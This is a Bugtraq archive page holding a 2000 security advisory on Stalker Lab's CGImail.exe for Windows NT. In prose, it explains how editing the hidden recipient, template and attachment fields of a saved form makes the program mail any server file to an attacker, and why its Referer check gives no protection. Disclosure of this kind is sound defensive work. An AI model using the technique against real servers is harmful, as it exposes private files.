Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Stalker's CGImail Gives Read Access to All Server Files

From: "Sverre H. Huseby" <shh () THATHOST COM>
Date: Tue, 29 Aug 2000 19:46:18 +0200
Stalker's CGImail Gives Read Access to All Server Files
-------------------------------------------------------

Stalker Lab's Mailers package for Windows NT contains the CGImail.exe
program, which is used to convert the contents of an HTML form to an
email.  The program takes a template file on the web server disk, and
substitutes special markup ("variables") with values from the form
before sending the mail.  Attachments are also supported.

Unfortunately, every part of the mail sending process is controlled by
(possibly hidden) values in the form.  A malicious user may thus save
the web page to disk, modify the recipient $To$ -variable, and the
template $File$ or $Attach$ -variable, and trick the program into
sending any file from the web server disk to himself.

I have tested this positively on an unknown version of CGImail.exe
(web server outside of my control, problem since fixed by removing
CGImail.exe).  The docs (cgimail.txt) for version 1.12 (1996-12-17)
available from http://www.winsite.com/info/pc/winnt/netutil/sm112.zip/
indicate that the same problem exists with that version.  The Stalker
Lab web page at http://www.stalkerlab.ch/SMailers/index.html is
unreachable (No route to host), but a cached version at Google shows
that a version of at least 1.20 is now available.  I have not been
able to find that version anywhere on the net.

The 1.12 docs has a section about "security": CGImail.exe may use the
CGI HTTP_REFERER environment variable to make sure the page containing
the form comes from the correct web server.  I'm sure we all know how
to fake a HTTP Referer header, so this sure is a false sense of
security.

No solution to the problem is known, except for disabling (and
deleting!) the program entirely.


Sverre H. Huseby <shh () thathost com>

--
<URL:mailto:shh () thathost com>
<URL:http://shh.thathost.com/>               Echelon bait: semtex, bin Laden,
                                         plutonium, North Korea, nuclear bomb
Previous By Date Next
Previous By Thread Next

Current thread: